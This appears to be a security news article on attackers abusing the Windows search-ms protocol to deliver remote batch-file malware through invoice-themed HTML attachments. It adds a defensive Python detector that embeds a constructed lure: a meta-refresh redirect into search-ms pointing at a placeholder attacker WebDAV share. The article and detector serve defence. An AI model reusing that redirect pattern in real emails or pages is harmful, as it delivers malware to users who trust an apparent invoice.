Abuse of Windows Search Protocol to Spread Malware

TapTechNews reported on June 13th that the cybersecurity company Trustwave published a blog post on June 11th stating that attackers are abusing the Windows Search protocol (search-ms URI) to spread malware by pushing batch files hosted on remote servers.


The Windows Search protocol is a Uniform Resource Identifier (URI) scheme; an application can invoke it to open Windows Explorer and run a search with specific parameters.

Although most Windows searches look at the index of the local device, it is also possible to force Windows Search to query file shares on remote hosts and to use a custom title for the search window.

According to the Trustwave report quoted by TapTechNews, there is already evidence that attackers are distributing malware by abusing the Windows Search protocol.

Trustwave observed a malicious email carrying an HTML attachment disguised as an invoice document, packed inside a small ZIP archive. The ZIP wrapper helps evade security/AV scanners, which may be unable to parse malicious content inside archives.


The HTML file uses a <meta http-equiv=refresh> tag so that the browser automatically opens the malicious URL as soon as the HTML document is opened.


If the meta refresh fails, for example because browser settings block the redirect, an anchor tag serves as a fallback: it provides a clickable link pointing to the malicious URL, although this requires user interaction.


The attackers run the search against the remote host using the following parameters:

Query: Searches for items marked INVOICE.

Crumb: Specifies the search scope and points it at the malicious server through Cloudflare.

Displayname: Renames the search window to Download, imitating a legitimate interface.

Location: Uses Cloudflare's tunnel service to mask the server and presents the remote resource as if it were a local file, so that it looks legitimate.
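For mail-gateway or sandbox triage, the parameters above are what a defender wants to pull out of a suspicious HTML attachment. The following is an added example, not Trustwave's code: it extracts meta-refresh and anchor URIs from HTML, parses any search-ms/search URI into its query, crumb, displayname and location parameters, and flags those whose crumb or location leaves the local index. The sample HTML is constructed and "attacker.example" is a placeholder host, not a real indicator.

```python
"""Flag HTML that redirects into the Windows Search protocol (search-ms).
Added example for this article, not Trustwave's code; SAMPLE_HTML is constructed
and "attacker.example" is a placeholder host, not a real indicator."""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed sample: meta refresh into a search-ms: URI plus an anchor fallback.
# The crumb uses Windows' WebDAV UNC form (\\host@SSL\DavWWWRoot), percent-encoded.
_URI = ("search-ms:query=INVOICE"
        "&amp;crumb=location:%5C%5Cattacker.example%40SSL%5CDavWWWRoot"
        "&amp;displayname=Download")
SAMPLE_HTML = (f'<html><head><meta http-equiv="refresh" content="0; url={_URI}">'
               f'</head><body><a href="{_URI}">Open invoice</a></body></html>')

class _UriCollector(HTMLParser):
    """Collect URIs from <meta http-equiv=refresh> and <a href> tags."""
    def __init__(self):
        super().__init__()
        self.uris = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # names are lowercased, entity references already decoded
        if tag == "a" and a.get("href"):
            self.uris.append(a["href"])
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            idx = (a.get("content") or "").lower().find("url=")
            if idx != -1:
                self.uris.append(a["content"][idx + 4:].strip())

def parse_search_ms(uri):
    """Return the search-ms/search parameters as {name: [values]}, else None."""
    parts = urlsplit(uri)
    if parts.scheme not in ("search-ms", "search"):
        return None
    # Parameters follow the scheme directly (no '//' or '?'), so they land in .path
    return {k.lower(): v for k, v in parse_qs(parts.path).items()}

def is_remote(params):
    """True when crumb/location leaves the local index (UNC, WebDAV@SSL or http path)."""
    for key in ("crumb", "location"):
        for val in params.get(key, []):
            v = val.lower().removeprefix("location:")
            if v.startswith("\\\\") or v.startswith("http") or "@ssl" in v:
                return True
    return False

def find_search_ms_redirects(html):
    """Return (uri, params, remote) for every search-ms URI the page would open."""
    c = _UriCollector()
    c.feed(html)
    found = [(u, parse_search_ms(u)) for u in c.uris]
    return [(u, p, is_remote(p)) for u, p in found if p is not None]
```

Any hit with remote set to True is worth quarantining for review, since a legitimate invoice has no reason to open Explorer against a remote share.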


To prevent this kind of threat, Trustwave suggests running the following commands to delete the registry entries for the search-ms/search URI protocol handlers:

reg delete HKEY_CLASSES_ROOT\search /f
reg delete HKEY_CLASSES_ROOT\search-ms /f